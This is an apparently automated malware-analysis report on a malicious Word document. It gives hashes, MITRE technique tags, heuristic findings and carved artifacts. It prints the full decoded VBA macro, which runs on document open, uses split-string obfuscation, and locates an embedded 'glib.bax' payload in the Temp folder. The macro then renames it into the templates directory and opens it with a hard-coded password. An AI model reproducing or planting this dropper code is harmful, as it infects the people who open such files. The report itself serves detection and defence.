Office (OLE) malware analysis — malicious · d387bb7970545808

MALICIOUS

Office (OLE)

451.0 KB Created: 2021-08-25 09:12:00 Authoring application: Microsoft Office Word First seen: 2021-09-13

MD5: 912d4577fff64d062e613da735f17991 SHA-1: 1dea29b7e9639ced1f5713b77a53d063c44dffc2 SHA-256: d387bb7970545808dc199de51b482ccb4faf5e8e1df678bc9116a81d51b0bc32

72 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro that triggers on Document_Open. The macro attempts to create a file named 'glib.doc' in the user's template directory and likely uses it to download and execute a secondary payload. The presence of the Document_Open macro and the embedded VBA code strongly suggests a macro-based attack vector.

Heuristics 5

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2889 bytes
SHA-256: `a74bdcba8c38c815f85b08988cb21bf0c5691c4077bcd41a1588a0676b3edd6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Option Compare Text Dim hdv As String Dim bbbb As String Dim med As String Private Sub Document_Open() Dim vcbc As String Dim dfgdgdg vcbc = Options.DefaultFilePath(wdUserTemplatesPath) If Dir(vcbc & "\glib.d" & "o" & "c") = "" Then Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Selection.Copy Call bvxfcsd If Len(hdv) > 2 Then Call nam(hdv) Call pppx(vcbc & "\glib.d" & "o" & "c") ActiveDocument.Close End If End If End Sub Sub hdhdd(asda As String) Dim MyFSO As FileSystemObject Dim MyFile As File Dim SourceFolder As String Dim DestinationFolder As String Dim MyFolder As Folder Dim MySubFolder As Folder Set MyFSO = New Scripting.FileSystemObject Call Search(MyFSO.GetFolder(asda), hdv) End Sub Attribute VB_Name = "Module1" Sub sad() msi = 0 End Sub Sub pppx(spoc As String) Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="123321", _ PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _ WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:="" End Sub Sub ousx() Call uoia(Options.DefaultFilePath(wdUserTemplatesPath)) End Sub Attribute VB_Name = "Module3" Sub bvxfcsd() Dim uuuuc uuuuc = Options.DefaultFilePath(wdUserTemplatesPath) Dim ewrwsdf As String ewrwsdf = "Loc" & "a" & "l/" ewrwsdf = ewrwsdf & "Temp" ntgs = 50 sda = 49 Dim kuls As String kuls = ewrwsdf While sda < 50 ntgs = ntgs - 1 If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then Else sda = 61 End If Wend Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & ewrwsdf) End Sub Attribute VB_Name = "Module123345" Dim pls As String Sub Search(mds As Object, pafs As String) Dim Nedc As Object Dim fffff fffff = "glib.b" & "ax" For Each Nedc In mds.SubFolders Search Nedc, pafs Next Nedc Dim Ters As Object For Each Ters In mds.Files If Ters.Name = fffff Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub Sub nam(pafs As String) Call ousx Dim oxl oxl = "\glib.d" & "o" & "c" Name pafs As pls & oxl End Sub Sub uoia(fffs As String) pls = fffs End Sub
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1691362078/Ole10Native	276271 bytes
SHA-256: `d97e1e998dea052aa0b0e2af8f0a6b90de6775efb7d1668d63c800d959f6a2f6`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.
`ole10native_00_glib.bax`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1691362078/Ole10Native; display_name=glib.bax; full_path=C:\Users\MyPc\AppData\Local\Temp\glib.bax; temp_path=; def_file=	275968 bytes
SHA-256: `7d449914b605c5d48ee6a62e2a3989aebef808dc6fe5c5901a204e595a0558eb`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.